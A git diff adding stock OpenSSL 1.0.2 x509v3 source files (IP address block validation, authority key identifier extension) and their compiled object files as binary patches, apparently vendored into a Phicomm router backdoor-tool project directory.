+            i1 = i2 + strspn(s + i2, " \t");
+            i2 = i1 + strspn(s + i1, addr_chars);
+            if (i1 == i2 || s[i2] != '\0') {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                          X509V3_R_EXTENSION_VALUE_ERROR);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            if (a2i_ipadd(max, s + i1) != length) {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                          X509V3_R_INVALID_IPADDRESS);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            if (memcmp(min, max, length_from_afi(afi)) > 0) {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                          X509V3_R_EXTENSION_VALUE_ERROR);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            if (!v3_addr_add_range(addr, afi, safi, min, max)) {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            break;
+        case '\0':
+            if (!v3_addr_add_prefix(addr, afi, safi, min, length * 8)) {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            break;
+        default:
+            X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                      X509V3_R_EXTENSION_VALUE_ERROR);
+            X509V3_conf_err(val);
+            goto err;
+        }
+
+        OPENSSL_free(s);
+        s = NULL;
+    }
+
+    /*
+     * Canonize the result, then we're done.
+     */
+    if (!v3_addr_canonize(addr))
+        goto err;
+    return addr;
+
+ err:
+    OPENSSL_free(s);
+    sk_IPAddressFamily_pop_free(addr, IPAddressFamily_free);
+    return NULL;
+}
+
+/*
+ * OpenSSL dispatch
+ */
+const X509V3_EXT_METHOD v3_addr = {
+    NID_sbgp_ipAddrBlock,       /* nid */
+    0,                          /* flags */
+    ASN1_ITEM_ref(IPAddrBlocks), /* template */
+    0, 0, 0, 0,                 /* old functions, ignored */
+    0,                          /* i2s */
+    0,                          /* s2i */
+    0,                          /* i2v */
+    v2i_IPAddrBlocks,           /* v2i */
+    i2r_IPAddrBlocks,           /* i2r */
+    0,                          /* r2i */
+    NULL                        /* extension-specific data */
+};
+
+/*
+ * Figure out whether extension sues inheritance.
+ */
+int v3_addr_inherits(IPAddrBlocks *addr)
+{
+    int i;
+    if (addr == NULL)
+        return 0;
+    for (i = 0; i < sk_IPAddressFamily_num(addr); i++) {
+        IPAddressFamily *f = sk_IPAddressFamily_value(addr, i);
+        if (f->ipAddressChoice->type == IPAddressChoice_inherit)
+            return 1;
+    }
+    return 0;
+}
+
+/*
+ * Figure out whether parent contains child.
+ */
+static int addr_contains(IPAddressOrRanges *parent,
+                         IPAddressOrRanges *child, int length)
+{
+    unsigned char p_min[ADDR_RAW_BUF_LEN], p_max[ADDR_RAW_BUF_LEN];
+    unsigned char c_min[ADDR_RAW_BUF_LEN], c_max[ADDR_RAW_BUF_LEN];
+    int p, c;
+
+    if (child == NULL || parent == child)
+        return 1;
+    if (parent == NULL)
+        return 0;
+
+    p = 0;
+    for (c = 0; c < sk_IPAddressOrRange_num(child); c++) {
+        if (!extract_min_max(sk_IPAddressOrRange_value(child, c),
+                             c_min, c_max, length))
+            return -1;
+        for (;; p++) {
+            if (p >= sk_IPAddressOrRange_num(parent))
+                return 0;
+            if (!extract_min_max(sk_IPAddressOrRange_value(parent, p),
+                                 p_min, p_max, length))
+                return 0;
+            if (memcmp(p_max, c_max, length) < 0)
+                continue;
+            if (memcmp(p_min, c_min, length) > 0)
+                return 0;
+            break;
+        }
+    }
+
+    return 1;
+}
+
+/*
+ * Test whether a is a subset of b.
+ */
+int v3_addr_subset(IPAddrBlocks *a, IPAddrBlocks *b)
+{
+    int i;
+    if (a == NULL || a == b)
+        return 1;
+    if (b == NULL || v3_addr_inherits(a) || v3_addr_inherits(b))
+        return 0;
+    (void)sk_IPAddressFamily_set_cmp_func(b, IPAddressFamily_cmp);
+    for (i = 0; i < sk_IPAddressFamily_num(a); i++) {
+        IPAddressFamily *fa = sk_IPAddressFamily_value(a, i);
+        int j = sk_IPAddressFamily_find(b, fa);
+        IPAddressFamily *fb;
+        fb = sk_IPAddressFamily_value(b, j);
+        if (fb == NULL)
+            return 0;
+        if (!addr_contains(fb->ipAddressChoice->u.addressesOrRanges,
+                           fa->ipAddressChoice->u.addressesOrRanges,
+                           length_from_afi(v3_addr_get_afi(fb))))
+            return 0;
+    }
+    return 1;
+}
+
+/*
+ * Validation error handling via callback.
+ */
+# define validation_err(_err_)           \
+  do {                                  \
+    if (ctx != NULL) {                  \
+      ctx->error = _err_;               \
+      ctx->error_depth = i;             \
+      ctx->current_cert = x;            \
+      ret = ctx->verify_cb(0, ctx);     \
+    } else {                            \
+      ret = 0;                          \
+    }                                   \
+    if (!ret)                           \
+      goto done;                        \
+  } while (0)
+
+/*
+ * Core code for RFC 3779 2.3 path validation.
+ */
+static int v3_addr_validate_path_internal(X509_STORE_CTX *ctx,
+                                          STACK_OF(X509) *chain,
+                                          IPAddrBlocks *ext)
+{
+    IPAddrBlocks *child = NULL;
+    int i, j, ret = 1;
+    X509 *x;
+
+    OPENSSL_assert(chain != NULL && sk_X509_num(chain) > 0);
+    OPENSSL_assert(ctx != NULL || ext != NULL);
+    OPENSSL_assert(ctx == NULL || ctx->verify_cb != NULL);
+
+    /*
+     * Figure out where to start.  If we don't have an extension to
+     * check, we're done.  Otherwise, check canonical form and
+     * set up for walking up the chain.
+     */
+    if (ext != NULL) {
+        i = -1;
+        x = NULL;
+    } else {
+        i = 0;
+        x = sk_X509_value(chain, i);
+        OPENSSL_assert(x != NULL);
+        if ((ext = x->rfc3779_addr) == NULL)
+            goto done;
+    }
+    if (!v3_addr_is_canonical(ext))
+        validation_err(X509_V_ERR_INVALID_EXTENSION);
+    (void)sk_IPAddressFamily_set_cmp_func(ext, IPAddressFamily_cmp);
+    if ((child = sk_IPAddressFamily_dup(ext)) == NULL) {
+        X509V3err(X509V3_F_V3_ADDR_VALIDATE_PATH_INTERNAL,
+                  ERR_R_MALLOC_FAILURE);
+        ret = 0;
+        goto done;
+    }
+
+    /*
+     * Now walk up the chain.  No cert may list resources that its
+     * parent doesn't list.
+     */
+    for (i++; i < sk_X509_num(chain); i++) {
+        x = sk_X509_value(chain, i);
+        OPENSSL_assert(x != NULL);
+        if (!v3_addr_is_canonical(x->rfc3779_addr))
+            validation_err(X509_V_ERR_INVALID_EXTENSION);
+        if (x->rfc3779_addr == NULL) {
+            for (j = 0; j < sk_IPAddressFamily_num(child); j++) {
+                IPAddressFamily *fc = sk_IPAddressFamily_value(child, j);
+                if (fc->ipAddressChoice->type != IPAddressChoice_inherit) {
+                    validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+                    break;
+                }
+            }
+            continue;
+        }
+        (void)sk_IPAddressFamily_set_cmp_func(x->rfc3779_addr,
+                                              IPAddressFamily_cmp);
+        for (j = 0; j < sk_IPAddressFamily_num(child); j++) {
+            IPAddressFamily *fc = sk_IPAddressFamily_value(child, j);
+            int k = sk_IPAddressFamily_find(x->rfc3779_addr, fc);
+            IPAddressFamily *fp =
+                sk_IPAddressFamily_value(x->rfc3779_addr, k);
+            if (fp == NULL) {
+                if (fc->ipAddressChoice->type ==
+                    IPAddressChoice_addressesOrRanges) {
+                    validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+                    break;
+                }
+                continue;
+            }
+            if (fp->ipAddressChoice->type ==
+                IPAddressChoice_addressesOrRanges) {
+                if (fc->ipAddressChoice->type == IPAddressChoice_inherit
+                    || addr_contains(fp->ipAddressChoice->u.addressesOrRanges,
+                                     fc->ipAddressChoice->u.addressesOrRanges,
+                                     length_from_afi(v3_addr_get_afi(fc))))
+                    sk_IPAddressFamily_set(child, j, fp);
+                else
+                    validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+            }
+        }
+    }
+
+    /*
+     * Trust anchor can't inherit.
+     */
+    OPENSSL_assert(x != NULL);
+    if (x->rfc3779_addr != NULL) {
+        for (j = 0; j < sk_IPAddressFamily_num(x->rfc3779_addr); j++) {
+            IPAddressFamily *fp =
+                sk_IPAddressFamily_value(x->rfc3779_addr, j);
+            if (fp->ipAddressChoice->type == IPAddressChoice_inherit
+                && sk_IPAddressFamily_find(child, fp) >= 0)
+                validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+        }
+    }
+
+ done:
+    sk_IPAddressFamily_free(child);
+    return ret;
+}
+
+# undef validation_err
+
+/*
+ * RFC 3779 2.3 path validation -- called from X509_verify_cert().
+ */
+int v3_addr_validate_path(X509_STORE_CTX *ctx)
+{
+    return v3_addr_validate_path_internal(ctx, ctx->chain, NULL);
+}
+
+/*
+ * RFC 3779 2.3 path validation of an extension.
+ * Test whether chain covers extension.
+ */
+int v3_addr_validate_resource_set(STACK_OF(X509) *chain,
+                                  IPAddrBlocks *ext, int allow_inheritance)
+{
+    if (ext == NULL)
+        return 1;
+    if (chain == NULL || sk_X509_num(chain) == 0)
+        return 0;
+    if (!allow_inheritance && v3_addr_inherits(ext))
+        return 0;
+    return v3_addr_validate_path_internal(NULL, chain, ext);
+}
+
+#endif                          /* OPENSSL_NO_RFC3779 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_addr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_addr.o
new file mode 100644
index 0000000000000000000000000000000000000000..df5742da6a46ee638dd6a9c888f7e3dc3fa0c23e
GIT binary patch
literal 1080
zcmbVLO-sW-5S=vj`=U3&OFXG)m((hv2MLtgi-?zk;6d_*LdgfoM(joZf<MP&|B}Bz
zXOdl9c2f@>n7p00@6Ap&?Z@c$rej$k!-8x0t0W8XrI21td$0)`0OR5C$~l|_Rmv;p
zk`0*K>t9rL*?&KEnR|BB&`qx{!Zzj#=J;*`9e_D;Hs*gp$9LiTr%hwGPE0+qdrR00
zPP6N&OoI)pCW(xV6B+S3c=DsDU?Bi2X9@QML|!!bB3C?q<G>=H`@n*-1QupV5~s+e
z8IKv>Ot0jAI2HACTCu#y^0?qL<HV(iJ#^8X>Tl*P=%#%BTCtB$;`Hz4)w||H_aC5S
z9dlX#33{ogi>Zbuier_;wLD+qxx%T^sahy&>66q57i*aMFDw@VN1z0HS2d`g?xp=t
qA({&$pG=~51&{wc<L+qdUJSY=bQ1LWcW^_$d(u7%;e#{^)cwDJyg2~?

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akey.c
new file mode 100644
index 0000000..e920270
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akey.c
@@ -0,0 +1,205 @@
+/* v3_akey.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+static STACK_OF(CONF_VALUE) *i2v_AUTHORITY_KEYID(X509V3_EXT_METHOD *method,
+                                                 AUTHORITY_KEYID *akeyid,
+                                                 STACK_OF(CONF_VALUE)
+                                                 *extlist);
+static AUTHORITY_KEYID *v2i_AUTHORITY_KEYID(X509V3_EXT_METHOD *method,
+                                            X509V3_CTX *ctx,
+                                            STACK_OF(CONF_VALUE) *values);
+
+const X509V3_EXT_METHOD v3_akey_id = {
+    NID_authority_key_identifier,
+    X509V3_EXT_MULTILINE, ASN1_ITEM_ref(AUTHORITY_KEYID),
+    0, 0, 0, 0,
+    0, 0,
+    (X509V3_EXT_I2V) i2v_AUTHORITY_KEYID,
+    (X509V3_EXT_V2I)v2i_AUTHORITY_KEYID,
+    0, 0,
+    NULL
+};
+
+static STACK_OF(CONF_VALUE) *i2v_AUTHORITY_KEYID(X509V3_EXT_METHOD *method,
+                                                 AUTHORITY_KEYID *akeyid,
+                                                 STACK_OF(CONF_VALUE)
+                                                 *extlist)
+{
+    char *tmp;
+    if (akeyid->keyid) {
+        tmp = hex_to_string(akeyid->keyid->data, akeyid->keyid->length);
+        X509V3_add_value("keyid", tmp, &extlist);
+        OPENSSL_free(tmp);
+    }
+    if (akeyid->issuer)
+        extlist = i2v_GENERAL_NAMES(NULL, akeyid->issuer, extlist);
+    if (akeyid->serial) {
+        tmp = hex_to_string(akeyid->serial->data, akeyid->serial->length);
+        X509V3_add_value("serial", tmp, &extlist);
+        OPENSSL_free(tmp);
+    }
+    return extlist;
+}
+
+/*-
+ * Currently two options:
+ * keyid: use the issuers subject keyid, the value 'always' means its is
+ * an error if the issuer certificate doesn't have a key id.
+ * issuer: use the issuers cert issuer and serial number. The default is
+ * to only use this if keyid is not present. With the option 'always'
+ * this is always included.
+ */
+
+static AUTHORITY_KEYID *v2i_AUTHORITY_KEYID(X509V3_EXT_METHOD *method,
+                                            X509V3_CTX *ctx,
+                                            STACK_OF(CONF_VALUE) *values)
+{
+    char keyid = 0, issuer = 0;
+    int i;
+    CONF_VALUE *cnf;
+    ASN1_OCTET_STRING *ikeyid = NULL;
+    X509_NAME *isname = NULL;
+    GENERAL_NAMES *gens = NULL;
+    GENERAL_NAME *gen = NULL;
+    ASN1_INTEGER *serial = NULL;
+    X509_EXTENSION *ext;
+    X509 *cert;
+    AUTHORITY_KEYID *akeyid;
+
+    for (i = 0; i < sk_CONF_VALUE_num(values); i++) {
+        cnf = sk_CONF_VALUE_value(values, i);
+        if (!strcmp(cnf->name, "keyid")) {
+            keyid = 1;
+            if (cnf->value && !strcmp(cnf->value, "always"))
+                keyid = 2;
+        } else if (!strcmp(cnf->name, "issuer")) {
+            issuer = 1;
+            if (cnf->value && !strcmp(cnf->value, "always"))
+                issuer = 2;
+        } else {
+            X509V3err(X509V3_F_V2I_AUTHORITY_KEYID, X509V3_R_UNKNOWN_OPTION);
+            ERR_add_error_data(2, "name=", cnf->name);
+            return NULL;
+        }
+    }
+
+    if (!ctx || !ctx->issuer_cert) {
+        if (ctx && (ctx->flags == CTX_TEST))
+            return AUTHORITY_KEYID_new();
+        X509V3err(X509V3_F_V2I_AUTHORITY_KEYID,
+                  X509V3_R_NO_ISSUER_CERTIFICATE);
+        return NULL;
+    }
+
+    cert = ctx->issuer_cert;
+
+    if (keyid) {
+        i = X509_get_ext_by_NID(cert, NID_subject_key_identifier, -1);
+        if ((i >= 0) && (ext = X509_get_ext(cert, i)))
+            ikeyid = X509V3_EXT_d2i(ext);
+        if (keyid == 2 && !ikeyid) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_KEYID,
+                      X509V3_R_UNABLE_TO_GET_ISSUER_KEYID);
+            return NULL;
+        }
+    }
+
+    if ((issuer && !ikeyid) || (issuer == 2)) {
+        isname = X509_NAME_dup(X509_get_issuer_name(cert));
+        serial = M_ASN1_INTEGER_dup(X509_get_serialNumber(cert));
+        if (!isname || !serial) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_KEYID,
+                      X509V3_R_UNABLE_TO_GET_ISSUER_DETAILS);
+            goto err;
+        }
+    }
+
+    if (!(akeyid = AUTHORITY_KEYID_new()))
+        goto err;
+
+    if (isname) {
+        if (!(gens = sk_GENERAL_NAME_new_null())
+            || !(gen = GENERAL_NAME_new())
+            || !sk_GENERAL_NAME_push(gens, gen)) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_KEYID, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        gen->type = GEN_DIRNAME;
+        gen->d.dirn = isname;
+    }
+
+    akeyid->issuer = gens;
+    akeyid->serial = serial;
+    akeyid->keyid = ikeyid;
+
+    return akeyid;
+
+ err:
+    X509_NAME_free(isname);
+    M_ASN1_INTEGER_free(serial);
+    M_ASN1_OCTET_STRING_free(ikeyid);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akey.o
new file mode 100644
index 0000000000000000000000000000000000000000..faa028c9ce1357d4abc14270087516fd82d5e7b8
GIT binary patch
literal 4960
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
JbjFF({x3_Lfi(aC

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akeya.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akeya.c
new file mode 100644
index 0000000..2cc85b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akeya.c
@@ -0,0 +1,73 @@
+/* v3_akey_asn1.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+ASN1_SEQUENCE(AUTHORITY_KEYID) = {
+        ASN1_IMP_OPT(AUTHORITY_KEYID, keyid, ASN1_OCTET_STRING, 0),
+        ASN1_IMP_SEQUENCE_OF_OPT(AUTHORITY_KEYID, issuer, GENERAL_NAME, 1),
+        ASN1_IMP_OPT(AUTHORITY_KEYID, serial, ASN1_INTEGER, 2)
+} ASN1_SEQUENCE_END(AUTHORITY_KEYID)
+
+IMPLEMENT_ASN1_FUNCTIONS(AUTHORITY_KEYID)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akeya.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_akeya.o
new file mode 100644
index 0000000000000000000000000000000000000000..f43d9ca63457d4da99ba1927f7b3c02807f9706b
GIT binary patch
literal 3256
zcmbuB&u`pR5XWchLJKW4iOMe(kR?zHqP2F@q80>bx2dxUgpIV>NUa2Nox~+evp-mS
zVZ#9`IB}?y6BjO(0Er{wFUSr40{#co6XFI)Wxn=I_T||Y5{zWe%;(L_n|*$M-p~D&
z#UqspsZ{7KntDo!t{k7*_0+7>9L>@nr=I_F>F#47zu}hoPgwq&mjCL3-&pS~t+tmt
zH-dNk8_U<|cC_2wqHY|IqY=f?s2lDewp6s&87soE{HHBn-LKU67kyX8bv|P`4rOY+
zBSP)I4uYEt3$ME`t#6F`$=H3(yXaLf)Gm)xxAxh5)vI25Im21TQC6t+5MRyKI&uAd
zF#VmU*@jd;ZBu13Q#o_;*zrAX7CFzRBbf~otXjaX6|n0T6E~-@E=TG22e|<TPT`IM
z*X|EzIb5koob=b{M;v-M2TwAo(DW%yj0nfz2Ig)~nC^k?5US<Hp>*Hp1{``c$6jDE
zXRHIB0pv1Yvqt|{QcCnTYmE_<s+%Re&m8qNNA(va@p}^QvW95<cZQt~$n7WAs9zOd
z<9}vfZ5c|{uO<9`3ID5v)5jNskPn5>+a&9(2;%6YAW3Lzz8hFWxzKJxL33sGYGWl>
zU0huAJ3*&$b;S>;vDT^u-6ZM-T!y;yTlrE45j>hJ+>bsnYNX!b6D_zkiXtOq>aH$y
zxR13?d%4x*7O3gB{5Ch(YP{>iPg`4Vb^NB^hM&r@OyT{f$NBpEK_*X?@N*>``wn8)
z(VdPr5YJWX>lp$*XYliEL%?wcY5W_2EZ|S_rCj$4&Wq{WIX#cSamK0WxvgCDT?qi!
z-wssAjYZ=zH)JVODc71n+XlzH&xt=Y_%mWdxng78aH(7pL%H^;^D1{G?ma8MDn5Df
zZZ8QpSSO=QZ>u$mc0w<SCJA|4VG@$J5y#|>25=Bw^J?rOC?#z1ptm#F<Zoz>leanO
z^`br(>kpF1<B!UPI0-jzi~m7?><veQVKhp1B|F;Y%^db3ZT0_Xmy_{~?326B3{p?;
z(;H$<Il~V2R^5bb|0tVhU-&83$kn~3&;G1%`wMi3d6C%jW8b6Zf6cFPE^5y6Wy&3K
